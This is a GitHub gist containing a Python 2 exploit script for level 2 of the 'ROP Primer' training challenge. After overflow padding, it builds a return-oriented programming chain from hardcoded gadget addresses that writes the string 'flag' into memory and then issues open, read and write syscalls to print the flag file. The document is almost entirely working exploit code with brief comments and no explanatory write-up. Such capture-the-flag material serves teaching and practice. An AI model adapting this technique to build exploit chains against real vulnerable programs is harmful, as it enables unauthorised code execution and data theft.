Skip to content

Instantly share code, notes, and snippets.

@rverton rverton/exploit.py
Created Nov 4, 2016

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
ROP Primer level2 - open, read and print flag file
Raw
exploit.py
import struct
def p(value):
return struct.pack('<L', value);
writeable_buffer = 0x080ca004
open_addr = 0x80515f0
read_addr = 0x80516a0
write_addr = 0x8051700
pop_eax = 0x080a81d6
pop_edx = 0x08052476
pop_ebx = 0x0805249e
pop_ecx_pop_ebx = 0x0805249d
inc_eax = 0x0806a2ef
inc_ebx = 0x08082cb0 # inc ebx; or al, -0x15; ret
inc_ecx = 0x08083c16 # inc ecx; adc al, 0x39; ret
mov_eax_edx = 0x08083d68 # mov [eax], edx; pop ebx; pop ebp; ret
mov_edx_eax = 0x08078e71
xor_eax_eax = 0x08097a7f
popret = 0x8048560
pop2ret = 0x8048893
pop3ret = 0x8048892
int_0x80 = 0x08052ba0
payload = ''
payload += 'A'*44
# 1/ put "flag" in memory
payload += p(pop_eax)
payload += p(writeable_buffer)
payload += p(pop_edx)
payload += 'flag'
payload += p(mov_eax_edx)
payload += 'AAAA' # dummy for pop ebx
payload += 'AAAA' # dummy for pop ebp
# Null-terminate flag string
payload += p(xor_eax_eax)
payload += p(pop_edx)
payload += p(writeable_buffer+0x4)
payload += p(mov_edx_eax)
# 2/ open file
# open(pathname, flags)
# eax = 0x05, ebx = filename, ecx = flags
payload += p(pop_ecx_pop_ebx)
payload += p(0xffffffff) # ecx = -1
payload += p(writeable_buffer) # ebx = buffer
payload += p(inc_ecx) # ebx = 0
payload += p(xor_eax_eax)
payload += p(inc_eax) # eax = 1
payload += p(inc_eax) # eax = 2
payload += p(inc_eax) # eax = 3
payload += p(inc_eax) # eax = 4
payload += p(inc_eax) # eax = 5
payload += p(int_0x80) # GO!
# 3/ read(fd, addr, count)
# eax = 0x03, ebx = fd, ecx = writeable_buffer, edx = count
payload += p(pop_ecx_pop_ebx)
payload += p(writeable_buffer) # ecx
payload += p(0xffffffff) # ebx = -1
payload += p(inc_ebx) # ebx = 0
payload += p(inc_ebx) # ebx = 1
payload += p(inc_ebx) # ebx = 2
payload += p(inc_ebx) # ebx = 3
payload += p(xor_eax_eax)
payload += p(inc_eax) # eax = 1
payload += p(inc_eax) # eax = 2
payload += p(inc_eax) # eax = 3
payload += p(pop_edx)
payload += p(0x01010101) # no null bytes
payload += p(int_0x80) # GO!
# 4/ write(fd, addr, count) to STDOUT
# eax = 0x04, ebx = fd, ecx = writeable_buffer, edx = count
payload += p(pop_ecx_pop_ebx)
payload += p(writeable_buffer) # ecx
payload += p(0xffffffff) # ebx = -1
payload += p(inc_ebx) # ebx = 0
payload += p(inc_ebx) # ebx = 1
payload += p(xor_eax_eax)
payload += p(inc_eax) # eax = 1
payload += p(inc_eax) # eax = 2
payload += p(inc_eax) # eax = 3
payload += p(inc_eax) # eax = 4
payload += p(pop_edx)
payload += p(0x01010101) # no null bytes
payload += p(int_0x80) # GO!
payload += 'BBBB' # just crash here
print payload
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.